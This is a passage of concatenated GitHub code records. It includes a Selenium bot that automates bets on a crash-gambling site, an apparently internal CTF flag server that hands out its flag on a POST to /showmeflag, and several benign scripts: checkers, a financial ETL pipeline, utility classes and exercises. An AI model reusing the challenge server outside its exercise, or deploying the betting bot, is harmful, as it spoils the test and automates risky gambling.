self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]')\r\n self.startAutoBet = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/button')\r\n self.manualBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[1]/div/div[2]/input')\r\n self.manualAutoCashOut = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/div/div[2]/input')\r\n self.startManualBet = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/button')\r\n self.autoBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/div/div[2]/input')\r\n\r\n def start(self):\r\n for _ in iter(int,1):\r\n self.tick()\r\n time.sleep(5)\r\n\r\n def tick(self):\r\n text = self.locationValue.text\r\n text = re.sub('[x]', '', text)\r\n text2 = self.locationValue2.text\r\n text2 = re.sub('[x]', '', text2)\r\n print(text)\r\n if not self.history:\r\n self.history.append(float(text))\r\n print(\"Adding \" + text + \"To history\")\r\n \r\n elif float(text) != self.history[-1]: \r\n self.history.append(float(text))\r\n datafile.write(str(text))\r\n datafile.write(\"\\n\")\r\n print(\"Adding \" + text + \"To history\")\r\n \r\n\r\n def findStreak(self):\r\n biggestStreak = 0\r\n value = float(input(\"Enter limit value: \"))\r\n currentStreak = 0\r\n inStreak = 0\r\n for element in self.history: \r\n if inStreak == 1:\r\n if element >= value:\r\n inStreak = 0\r\n currentStreak = 0\r\n else:\r\n currentStreak+=1\r\n if currentStreak > 2:\r\n print(\"Streak Greater than 2\")\r\n elif element < value:\r\n inStreak = 1\r\n currentStreak = 1\r\n if currentStreak > biggestStreak:\r\n biggestStreak = currentStreak\r\n print(biggestStreak)\r\n print(\"The biggest Streak of values below \" + str(value) + \" was: \" + str(biggestStreak))\r\n\r\n\r\n def createHistory(self):\r\n self.history = open(\"testData.txt\").readlines()\r\n self.history = [word.strip() for word in self.history]\r\n self.history = [float(i) for i in self.history]\r\n\r\n def findAfterDouble(self):\r\n counter = 0\r\n inputValue = float(input(\"Enter limit value: \"))\r\n PositionArray = [0] * 25\r\n for counter in range(0,len(self.history)):\r\n if self.history[counter] < inputValue:\r\n if counter + 1 < len(self.history):\r\n if self.history[counter+1] < inputValue:\r\n self.findPositions(PositionArray, counter + 1, inputValue)\r\n print(\"Position Array: \")\r\n print(PositionArray)\r\n\r\n def findPositions(self, PositionArray, startIndex, targetValue):\r\n for i in range(0,25):\r\n if(startIndex + i < len(self.history) and self.history[startIndex + i] < targetValue):\r\n PositionArray[i] += 1\r\n\r\n def automate(self):\r\n #betAmount = float(input(\"Enter Bet Amount: \"))\r\n cashOut = float(input(\"Enter CashOut Value: \"))\r\n #stopOnLoss = float(input(\"Enter stop on loss amount: \"))\r\n #skipNo = int(input(\"Enter number of spaces to skip on 2 losses: \"))\r\n\r\n \r\n self.startAutoBet.click()\r\n\r\n self.cash = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[1]/header/div/div[1]/div/div[2]')\r\n cashValue = self.cash.text\r\n cashValue = re.sub('[$]', '', cashValue)\r\n cashValue = float(cashValue)\r\n initialCashValue = cashValue\r\n\r\n for _ in iter(int,1):\r\n text1 = self.locationValue.text\r\n text1 = re.sub('[x]', '', text1)\r\n text2 = self.locationValue2.text\r\n text2 = re.sub('[x]', '', text2)\r\n \r\n cashValue = self.cash.text\r\n cashValue = re.sub('[$]', '', cashValue)\r\n cashValue = float(cashValue)\r\n \r\n print(\"$\" + str(cashValue))\r\n \r\n\r\n #and float(text2) < cashOut\r\n if float(text1) < 2.0: \r\n print(\"Inside If Statement\") \r\n self.startAutoBet = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/button')\r\n self.startAutoBet.click()\r\n #wait until 2 rounds hav\r\n # e passed \r\n self.wait(2)\r\n\r\n #Place the manual bets\r\n self.manualButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]')\r\n self.manualButton.click()\r\n \r\n self.manualBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[1]/div/div[2]/input')\r\n self.manualBetAmount.clear()\r\n self.manualBetAmount.send_keys(self.getBetAmount(initialCashValue, 1))\r\n self.manualAutoCashOut.clear()\r\n self.manualAutoCashOut.send_keys(\"1.07\")\r\n self.startManualBet.click()\r\n \r\n self.wait(1)\r\n \r\n curr = self.locationValue.text\r\n curr = re.sub('[x]', '', curr)\r\n if float(curr) < cashOut: \r\n self.manualButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]')\r\n self.manualButton.click() \r\n self.manualBetAmount.clear()\r\n self.manualBetAmount.send_keys(self.getBetAmount(initialCashValue, 2))\r\n self.manualAutoCashOut.clear()\r\n self.manualAutoCashOut.send_keys(\"1.07\")\r\n self.startManualBet.click()\r\n\r\n self.wait(1)\r\n\r\n\r\n self.automatedButton.click()\r\n \r\n cashValue = self.cash.text\r\n cashValue = re.sub('[$]', '', cashValue)\r\n cashValue = float(cashValue)\r\n \r\n self.autoBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/div/div[2]/input')\r\n self.autoBetAmount.clear()\r\n time.sleep(0.1)\r\n self.autoBetAmount.send_keys(self.getBetAmount(cashValue, 0))\r\n\r\n initialCashValue = cashValue\r\n time.sleep(0.1)\r\n\r\n self.startAutoBet.click()\r\n self.wait(1)\r\n \r\n \r\n time.sleep(3)\r\n\r\n def getBetAmount(self, CashAmount, currentLossStreak):\r\n Num = CashAmount - (0.06*CashAmount)\r\n initialDivisor = float(98.26/104.4)\r\n secondDivisor = float(0.34/5.78)\r\n betAmount = float(Num * initialDivisor)\r\n for counter in range(3-currentLossStreak):\r\n betAmount = betAmount * secondDivisor\r\n print(betAmount)\r\n return str(round(betAmount,4))\r\n\r\n\r\n def findInstances(self):\r\n inputValue = float(input(\"Enter value: \"))\r\n counter = 0\r\n for element in self.history:\r\n if element < 1.1:\r\n counter+=1\r\n print(counter)\r\n\r\n def wait(self, turns):\r\n currentValue = None\r\n counter = -1\r\n for _ in iter(int, 1):\r\n if currentValue != self.locationValue.text:\r\n print(\"waited a turn\")\r\n counter+=1\r\n currentValue = self.locationValue.text\r\n\r\n if counter == turns:\r\n break\r\n\r\n \r\nbot = StreakBot()\r\ntime.sleep(3)\r\nbot.login()\r\n\r\n\r\n\r\n","repo_name":"Grumblyguy/crashbot","sub_path":"dataBot.py","file_name":"dataBot.py","file_ext":"py","file_size_in_byte":9431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38202494272","text":"import os\nfrom http.server import HTTPServer\nfrom http.server import BaseHTTPRequestHandler\n\nclass MyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type', \"text/html\")\n self.end_headers()\n self.wfile.write(b'It works!')\n\n def do_POST(self):\n flag = os.environ.get('FLAG')\n if not flag:\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.end_headers()\n self.wfile.write(b'Something went wrong. Please call admin.')\n return\n\n if self.path != '/showmeflag':\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.end_headers()\n self.wfile.write(b'Idiot')\n return\n\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.end_headers()\n self.wfile.write(flag.encode())\n\nserver_address = ('0.0.0.0', 3000)\nhttpd = HTTPServer(server_address, MyHTTPRequestHandler)\nhttpd.serve_forever()\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/Ricerca/2023/web/ps-converter/flag/flag_server.py","file_name":"flag_server.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"69857601848","text":"import argparse\nimport gc\nimport sys\nimport json\nimport os.path\nimport random\nimport time\n\nimport checkers.heuristics as heuristics\n\ntry:\n from math import inf\nexcept ImportError:\n inf = float('inf')\n\nfrom checkers.game_api import GameOver\nfrom checkers.players import SimpleMcCartneyServerPlayer\n\nweights_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),\"weights.json\")\n\nif __name__ == \"__main__\":\n random.seed(time.time())\n parser = argparse.ArgumentParser(description='Plays a given number of games with a given opponent using the given user number.')\n parser.add_argument('-o', '--opponent', type=int, default=0, help='The opponent user number.')\n parser.add_argument('-u', '--user', type=int, default=5, help='Your user number (5 or 6).')\n parser.add_argument('-c', '--count', type=int, default=1, help='Number of consecutive games to play.')\n parser.add_argument('-w', '--weights', default=weights_file, help='File with weight constants')\n parser.add_argument('-v', '--verbose', default=False, help='\\'True\\' if you want to display each message sent between the client and server')\n args = parser.parse_args()\n final = \"\"\n error = False\n wins = 0\n losses = 0\n draws = 0\n num = 0\n total_time = 0\n max_time = 0\n min_time = 0\n\n # How many times to run a game\n count = args.count\n\n global weights\n weights = json.load(open(args.weights, 'r'))\n\n error = False\n while not error and count>0:\n start_time = time.time()\n print(\"Start {}:\".format(count))\n game = SimpleMcCartneyServerPlayer(args.opponent, args.user==6, 1 if args.verbose else 0)\n try:\n # game.start()\n while True:\n actions = game.board.list_actions()\n bestScore = -inf\n move_list = []\n if len(actions) != 0:\n if len(actions) == 1:\n result = game.recv_move(actions[0])\n if isinstance(result, GameOver):\n raise result\n else:\n for act in actions:\n score = heuristics.alphabeta_search(game.board.result(act), game._client_is_white, weights)\n if float(score) > bestScore:\n bestScore = score\n move_list = [act]\n elif score == bestScore:\n move_list.append(act)\n index = random.randint(0, len(move_list)-1)\n result = game.recv_move(move_list[index])\n if isinstance(result, GameOver):\n raise result\n else:\n error = True\n print(\"Error: No actions available.\")\n break\n except GameOver as inst:\n print(\"GameOver Exception: \", inst.result, file=sys.stderr)\n if inst.result:\n game.show_game()\n if inst.result == \"Draw\":\n draws+=1\n elif inst.result == (\"White\" if game._client_is_white else \"Black\"):\n wins+=1\n elif inst.result == (\"Black\" if game._client_is_white else \"White\"):\n losses+=1\n else:\n print(\"Unknown result? : \" + inst.result)\n else:\n error = True\n time_diff = time.time() - start_time\n if time_diff > max_time:\n max_time = time_diff\n if time_diff < min_time or num == 0:\n min_time = time_diff\n total_time+=time_diff\n print(\"Finished in {}s\\n\".format(time_diff))\n num+=1\n count-=1\n\n game = None\n gc.collect()\n\n # print(\"eval cache: \", eval.cache_info())\n print(\"Stats: {}w:{}d:{}l\\navg time = {}s\\nmax time = {}s\\nmin time = {}s\".format(wins, draws, losses, total_time/num, max_time, min_time))\n","repo_name":"keelimeguy/checkers-ai","sub_path":"checkers/blocking_game_example.py","file_name":"blocking_game_example.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12535388589","text":"import pandas as pd\nfrom urllib.request import urlopen\nimport certifi\nimport json\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\", category = DeprecationWarning) \n\n\n######################################################################################################################\n# NEW BLOCK - Get financial data functions\n######################################################################################################################\n\n# https://site.financialmodelingprep.com/developer/docs\n# example@gmail.com: 'key'\n\n# Get balance sheet\ndef get_balance_sheet_data(ticker, key):\n \"\"\"\n - Gets 5 years of balance sheet data per ticker\n \"\"\"\n url = (f\"https://financialmodelingprep.com/api/v3/balance-sheet-statement/{ticker}?apikey={key}\")\n response = urlopen(url, cafile = certifi.where())\n data = response.read().decode(\"utf-8\")\n return json.loads(data)\n\n# get income statement\ndef get_income_statement_data(ticker, key):\n \"\"\"\n - Gets 5 years of income statement data per ticker\n \"\"\"\n url = (f\"https://financialmodelingprep.com/api/v3/income-statement/{ticker}?apikey={key}\")\n response = urlopen(url, cafile = certifi.where())\n data = response.read().decode(\"utf-8\")\n return json.loads(data)\n\n# Get cash-flow statement\ndef get_cash_flow_statement_data(ticker, key):\n \"\"\"\n - Gets 5 years of cash-flow statement data per ticker\n \"\"\"\n url = (f\"https://financialmodelingprep.com/api/v3/cash-flow-statement/{ticker}?apikey={key}\")\n response = urlopen(url, cafile = certifi.where())\n data = response.read().decode(\"utf-8\")\n return json.loads(data)\n\n\n######################################################################################################################\n# NEW BLOCK - Run data wrangling pipeline\n######################################################################################################################\n\ndef parse_financial_api():\n \"\"\"\n - Runs API pipeline\n - Transforms data\n - Exports data to data directory as a CSV\n \"\"\"\n # Import S&P 500 Index companies\n #####################################################################################################\n tickers_df = pd.read_csv(\n r\"Data/S&P500_Index_Companies.csv\",\n sep = ',',\n encoding = 'unicode_escape'\n )\n\n # Convert tickers to list\n tickers = tickers_df['ticker'].tolist()\n companies = tickers_df['company'].tolist()\n \n # example@gmail.com: 'key'\n key = 'key' \n \n # Wrangle API\n ##################################################################################################### \n # Store parsed data\n balance_sheet_df_list = []\n income_statement_df_list = []\n cash_flow_statement_df_list = []\n\n for ticker, company in zip(tickers, companies):\n # Get balance sheet\n ###########################################\n balance_sheet = get_balance_sheet_data(\n ticker = ticker, \n key = key\n )\n\n # Append df\n balance_sheet = pd.DataFrame(balance_sheet)\n \n balance_sheet = balance_sheet.drop(\n ['link','finalLink'], \n axis = 1,\n errors = 'ignore'\n )\n \n balance_sheet['financialStatement'] = 'Balance Sheet'\n balance_sheet['company'] = company\n balance_sheet_df_list.append(balance_sheet)\n \n print(' '.join(['Completed balance sheet', str(ticker)]))\n\n # get income statement\n ###########################################\n income_statement = get_income_statement_data(\n ticker = ticker, \n key = key\n )\n\n # Append df\n income_statement = pd.DataFrame(income_statement)\n \n income_statement = income_statement.drop(\n ['link','finalLink'], \n axis = 1,\n errors = 'ignore'\n )\n \n income_statement['financialStatement'] = 'Income Statement'\n income_statement['company'] = company\n income_statement_df_list.append(income_statement)\n \n print(' '.join(['Completed income statement', str(ticker)]))\n\n # Get cash-flow statement\n ###########################################\n cash_flow_statement = get_cash_flow_statement_data(\n ticker = ticker, \n key = key\n )\n\n # Append df\n cash_flow_statement = pd.DataFrame(cash_flow_statement)\n \n cash_flow_statement = cash_flow_statement.drop(\n ['link','finalLink'], \n axis = 1,\n errors = 'ignore'\n )\n \n cash_flow_statement['financialStatement'] = 'Cash-Flow Statement'\n cash_flow_statement['company'] = company\n cash_flow_statement_df_list.append(cash_flow_statement)\n \n print(' '.join(['Completed cash-flow statement', str(ticker)]))\n \n time.sleep(1.5)\n\n \n # Concat all data per list\n ##################################################################################################### \n balance_sheet_df = pd.concat(balance_sheet_df_list, axis = 0)\n income_statement_df = pd.concat(income_statement_df_list, axis = 0)\n cash_flow_statement_df = pd.concat(cash_flow_statement_df_list, axis = 0)\n \n \n # Unpivot data to long form\n ##################################################################################################### \n # Balance sheet\n balance_sheet_df = pd.melt(\n balance_sheet_df,\n \n id_vars = [\n 'date',\n 'symbol',\n 'reportedCurrency',\n 'cik',\n 'fillingDate',\n 'acceptedDate',\n 'calendarYear',\n 'period',\n 'financialStatement',\n 'company'\n ], \n \n value_vars = balance_sheet_df.columns[7:-1],\n var_name = 'financialAccounts', \n value_name = 'financialValues'\n )\n\n # adjust account string to proper\n balance_sheet_df['financialAccounts'] = balance_sheet_df['financialAccounts'].str.replace( r\"([A-Z])\", r\" \\1\").str.strip().str.title()\n \n # Income statement\n income_statement_df = pd.melt(\n income_statement_df,\n \n id_vars = [\n 'date',\n 'symbol',\n 'reportedCurrency',\n 'cik',\n 'fillingDate',\n 'acceptedDate',\n 'calendarYear',\n 'period',\n 'financialStatement',\n 'company'\n ], \n \n value_vars = income_statement_df.columns[7:-1],\n var_name = 'financialAccounts', \n value_name = 'financialValues'\n )\n\n # adjust account string to proper\n income_statement_df['financialAccounts'] = income_statement_df['financialAccounts'].str.replace( r\"([A-Z])\", r\" \\1\").str.strip().str.title()\n \n # Cash-flow statement\n cash_flow_statement_df = pd.melt(\n cash_flow_statement_df,\n \n id_vars = [\n 'date',\n 'symbol',\n 'reportedCurrency',\n 'cik',\n 'fillingDate',\n 'acceptedDate',\n 'calendarYear',\n 'period',\n 'financialStatement',\n 'company'\n ], \n \n value_vars = cash_flow_statement_df.columns[7:-1],\n var_name = 'financialAccounts', \n value_name = 'financialValues'\n )\n\n # adjust account string to proper\n cash_flow_statement_df['financialAccounts'] = cash_flow_statement_df['financialAccounts'].str.replace( r\"([A-Z])\", r\" \\1\").str.strip().str.title()\n \n # Concat all data to one data frame\n ##################################################################################################### \n df = pd.concat([balance_sheet_df, income_statement_df], axis = 0)\n df = pd.concat([df, cash_flow_statement_df], axis = 0)\n \n # rename columns\n df .columns = [\n 'date', \n 'ticker', \n 'reported_currency', \n 'cik', \n 'filling_date',\n 'accepted_date', \n 'calendar_year', \n 'period', \n 'financial_statement',\n 'company',\n 'financial_accounts',\n 'financial_values'\n ]\n \n # reorder columns to match view\n df = df[[\n 'cik',\n 'company',\n 'ticker',\n 'financial_accounts',\n 'financial_statement',\n 'date',\n 'filling_date',\n 'accepted_date',\n 'calendar_year',\n 'financial_values'\n ]]\n \n\n # Export data\n ##################################################################################################### \n df.to_csv(\n 'Data/Financial_Statement_Data.csv', \n index = False, \n encoding = 'utf8'\n ) \n \n print('Program complete')\n\nif __name__ == '__main__':\n parse_financial_api()\n \n ","repo_name":"joseppbenvenuto/S-P_500_Financial_Analysis","sub_path":"Financial_Statement_API_ETL_Pipeline/API_Financial_Statements.py","file_name":"API_Financial_Statements.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6439740990","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport pytz\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport pathlib\nimport cw_file_utils as cw_fu\nimport pkg_resources\nimport pickle\nimport gzip\n\nclass Jarvis:\n # lowercase are internal to class params\n timezone = 'America/New_York'\n startuptime = datetime.now(pytz.timezone(timezone))\n longDateFormat = \"%d-%b-%Y, %H:%M\"\n shortTimeFormat = \"%H:%M\"\n utility_files_dir = 'utility_files'\n data_dir = 'data'\n data_subdir1 = '01_original'\n data_subdir2 = '02_working'\n data_subdir3 = '03_train'\n data_subdir4 = '04_test'\n data_subdir5 = '05_experiments'\n\n data_subdirs = [data_subdir1, data_subdir2, data_subdir3, data_subdir4, data_subdir5]\n\n PROJECT_NAME = ''\n ROOT_DIR = ''\n ROOT_DATA_DIR = ''\n DATA_DIR = ''\n DATA_DIR_ORIG = ''\n DATA_DIR_WORK = ''\n DATA_DIR_TEST = ''\n DATA_DIR_TRAIN = ''\n WORKING_DIR = ''\n UTILITY_DIR = ''\n\n\n def __init__(self,\n ROOT_DIR,\n PROJECT_NAME\n ):\n\n self.ROOT_DIR = ROOT_DIR\n self.PROJECT_NAME = PROJECT_NAME\n self.UTILITY_DIR = join(self.ROOT_DIR,self.utility_files_dir)\n\n self.startup()\n #self.showenvironment()\n self.environmentScan()\n self.greeting()\n\n def startup(self):\n print(\"Wha...where am I?\")\n self.ROOT_DATA_DIR = join(self.ROOT_DIR, self.data_dir)\n self.DATA_DIR = join(self.ROOT_DATA_DIR, self.PROJECT_NAME)\n self.WORKING_DIR = join(self.ROOT_DIR, self.PROJECT_NAME)\n self.DATA_DIR_ORIG = join(self.DATA_DIR, self.data_subdir1)\n self.DATA_DIR_WORK = join(self.DATA_DIR, self.data_subdir2)\n self.DATA_DIR_TRAIN = join(self.DATA_DIR, self.data_subdir3)\n self.DATA_DIR_TEST = join(self.DATA_DIR, self.data_subdir4)\n self.DATA_DIR_EXP = join(self.DATA_DIR, self.data_subdir5)\n print(\"I am awake now.\")\n\n def whattimeisit(self):\n now = datetime.now(pytz.timezone(self.timezone))\n print(\"The current time is \" + now.strftime(self.shortTimeFormat))\n\n def showenvironment(self):\n print(\"I am inspecting the local environment...\")\n print('')\n print(\"Your environment has been configured: \")\n print(\"PROJECT_NAME: \" + self.PROJECT_NAME)\n print(\"ROOT_DIR: \" + self.ROOT_DIR)\n print(\"WORKING_DIR: \" + self.WORKING_DIR)\n print('')\n print(\"ROOT_DATA_DIR: \" + self.ROOT_DIR)\n print(\"DATA_DIR: \" + self.DATA_DIR)\n print(\"DATA_DIR_ORIG:\" + self.DATA_DIR_ORIG)\n print(\"DATA_DIR_WORK:\" + self.DATA_DIR_WORK)\n print(\"DATA_DIR_TRAIN:\" + self.DATA_DIR_TRAIN)\n print(\"DATA_DIR_TEST:\" + self.DATA_DIR_TEST)\n print('')\n print(\"UTILITY_DIR: \" + self.UTILITY_DIR)\n\n def displayProjects(self):\n onlyDirs = [f for f in listdir(self.ROOT_DIR) if not isfile(join(self.ROOT_DIR, f))]\n onlyDirs.sort()\n print(\"Project listing:\")\n for x in onlyDirs:\n print(\"--> \" + x)\n\n def environmentScan(self):\n self.setupWorkingDir()\n self.setupDataDir()\n\n #self.showProjectWorkFiles()\n #self.showProjectDataFiles()\n\n # Set directory to WORKING_DIR\n os.chdir(self.WORKING_DIR)\n print(\"I have set your current working directory to {0}\".format(os.getcwd()))\n\n def setupWorkingDir(self):\n if not os.path.exists(self.WORKING_DIR):\n # Create a new directory because it does not exist\n os.makedirs(self.WORKING_DIR)\n print(\"The working directory is not present. Directory created.\")\n\n def setupDataDir(self):\n if not os.path.exists(self.DATA_DIR):\n os.makedirs(self.DATA_DIR)\n print(\"The project data directory is not present. Directory created.\")\n\n for x in self.data_subdirs:\n if not(os.path.exists(join(self.DATA_DIR, x))):\n os.makedirs(join(self.DATA_DIR, x))\n print(\"Data subdirectory \" + x + \" has been created\")\n\n print('')\n\n def greeting(self):\n greeting = ''\n x = int(self.startuptime.strftime(\"%H\"))\n\n if (x > 7) and (x <= 8):\n greeting = 'An early morning I see.'\n elif (x > 8) and (x <= 12):\n greeting = 'Extra caffeine may help.'\n elif (x > 12) and (x <= 18):\n greeting = 'Reminder, no more coffee.'\n elif (x > 18) and (x <= 20):\n greeting = 'I hope you had dinner.'\n elif (x > 20) and (x <= 24):\n greeting = 'I see you are having a productive evening.'\n elif (x <= 7):\n greeting = 'You should really be sleeping.'\n\n self.whattimeisit()\n print(\"Hello sir. \" + greeting)\n print('')\n\n def showProjectDataFiles(self):\n print(\"Here are all your project data files\")\n cw_fu.exploreDirectory(self.DATA_DIR)\n\n def showProjectWorkFiles(self):\n print(\"Here are all your project work files\")\n cw_fu.exploreDirectory(self.WORKING_DIR)\n\n def showAllDataFiles(self):\n print(\"Here are all your available data files\")\n cw_fu.exploreDirectory(self.ROOT_DATA_DIR)\n\n def compressProjectDataFiles(self, removeOriginal=False):\n cw_fu.exploreDirectory(self.DATA_DIR, compress=True, removeOriginal=removeOriginal)\n\n def compressAllDataFiles(self, removeOriginal=False):\n cw_fu.exploreDirectory(self.ROOT_DATA_DIR, compress=True, removeOriginal=removeOriginal)\n\n def getPackageVersion(self, pkgName):\n print(pkgName + \" version: \" + str(pkg_resources.get_distribution(pkgName)))\n\n def saveExperiment(self, dataExperiment, fileName, fileExtension='.jexp'):\n pickle.dump(dataExperiment, gzip.open(f'{self.DATA_DIR_EXP}/{fileName}{fileExtension}.gz', 'wb'))\n\n def loadExperiment(self, fileName, fileExtension='.jexp'):\n obj = pickle.load(gzip.open(f'{self.DATA_DIR_EXP}/{fileName}{fileExtension}.gz', 'rb'))\n return obj\n","repo_name":"mvmagni/ML_Univ","sub_path":"utility_files/jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9679251503","text":"#!/usr/bin/python3\n\"\"\"Square\"\"\"\n\n\nclass Square:\n \"\"\"constructor\"\"\"\n def __init__(self, size=0):\n if (type(size) is not int):\n raise TypeError(\"size must be an integer\")\n if (size < 0):\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n def area(self):\n \"\"\"\"area return\"\"\"\n return self.__size ** 2\n\n @property\n def size(self):\n \"\"\"getter\"\"\"\n return self.__size\n\n @size.setter\n def size(self, aux):\n \"\"\"setter\"\"\"\n if (type(aux) is not int):\n raise TypeError(\"size must be an integer\")\n if (aux < 0):\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = aux\n\n def my_print(self):\n \"\"\"prints # for each size value\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__size):\n print(\"#\" * self.__size)\n","repo_name":"balbinxx/holbertonschool-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37914414217","text":"import threading\nimport socket\n\nclass ClientHandler(threading.Thread):\n def __init__(self, comm_socket, likeliestClassValue):\n super(ClientHandler, self).__init__()\n self.comm_socket = comm_socket\n self.likeliestClassValue = likeliestClassValue\n\n def run(self):\n #print(\"started thread\")\n data = self.comm_socket.send(bytes(str(self.likeliestClassValue), \"utf-8\"))\n self.comm_socket.close()\n\n\n#def serverProcess(host_addr, likeliestClass, classCounter):\ndef serverProcess(host_addr, likeliestClass, classCounter, inferenceLock):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(host_addr)\n s.listen()\n print(\"server listening on\", host_addr)\n while True:\n comm_socket, comm_addr = s.accept()\n # read likeliest class\n inferenceLock.acquire()\n likeliestClass.acquire()\n likeliestClassValue = likeliestClass.value\n likeliestClass.release()\n inferenceLock.release()\n\n # clean the counter as we're now going to infer the next symbol\n classCounter.acquire()\n for i in range(len(classCounter)):\n classCounter[i] = 0\n classCounter.release()\n handler_thread = ClientHandler(comm_socket, likeliestClassValue)\n handler_thread.start()\n","repo_name":"mmguberina/HUMROgroup5","sub_path":"serverProcess.py","file_name":"serverProcess.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11026051112","text":"from typing import Optional, List\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def postorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n return self.postorderTraversal(root.left) + self.postorderTraversal(root.right) + [root.val]\n \n\nclass Solution:\n def postorderTraversal(self, root: TreeNode) -> List[int]:\n if not root:\n return list()\n \n res = list()\n stack = list()\n prev = None\n\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n root = stack.pop()\n # 每个节点两次入栈出栈,第一次是为了找他的右子树,第二次是为了找他自己,即根节点\n # 若没有右子树,或者右子树已经遍历过,就可以添加这个根节点了\n # 注意要置root为None,表示其左右子树均已遍历,防止其继续向下遍历\n if not root.right or root.right == prev:\n res.append(root.val)\n prev = root\n root = None\n else:\n stack.append(root)\n root = root.right\n \n return res\n \n\ndef stringToTreeNode(input):\n input = input.strip()\n input = input[1:-1]\n if not input:\n return None\n\n inputValues = [s.strip() for s in input.split(',')]\n root = TreeNode(int(inputValues[0]))\n nodeQueue = [root]\n front = 0\n index = 1\n while index < len(inputValues):\n node = nodeQueue[front]\n front = front + 1\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n leftNumber = int(item)\n node.left = TreeNode(leftNumber)\n nodeQueue.append(node.left)\n\n if index >= len(inputValues):\n break\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n rightNumber = int(item)\n node.right = TreeNode(rightNumber)\n nodeQueue.append(node.right)\n return root\n\n\nsol = Solution()\nprint(sol.postorderTraversal(root = stringToTreeNode(\"[1,null,2,3]\")))","repo_name":"sea72/myLeetCode","sub_path":"binary_tree/145_postorder.py","file_name":"145_postorder.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331116489","text":"#Aprobación de créditos\ningreso = int(input(\"Ingreso: \"))\nano_nacimiento = int(input(\"Año de año nacimiento: \"))\nnumero_hijos = int(input(\"Cantidad de hijos: \"))\nantiguedad_banco = int(input(\"Años de pertenencia al banco: \"))\nestado_civil = input(\"S: soltero, C: casado: \")\ncampo_cuidad = input(\"U: urbano, R: rural: \")\n\nedad= ano_nacimiento-2020\n\nif antiguedad_banco > 10 and numero_hijos >= 2:\n\tprint(\"APROBADO\")\n\nif (estado_civil == \"C\" or estado_civil == \"c\") and numero_hijos > 3 and 45 <= edad >= 55:\n\tprint(\"APROBADO\")\n\nif ingreso > 2500000 and (estado_civil == \"S\" or estado_civil == \"s\") and (campo_cuidad == \"U\" or campo_cuidad == \"u\"):\n\tprint(\"APROBADO\")\n\nif ingreso > 3500000 and antiguedad_banco > 5:\n\tprint(\"APROBADO\")\n\nif (campo_cuidad == \"R\" or campo_cuidad == \"r\") and (estado_civil == \"C\" or estado_civil == \"c\") and numero_hijos < 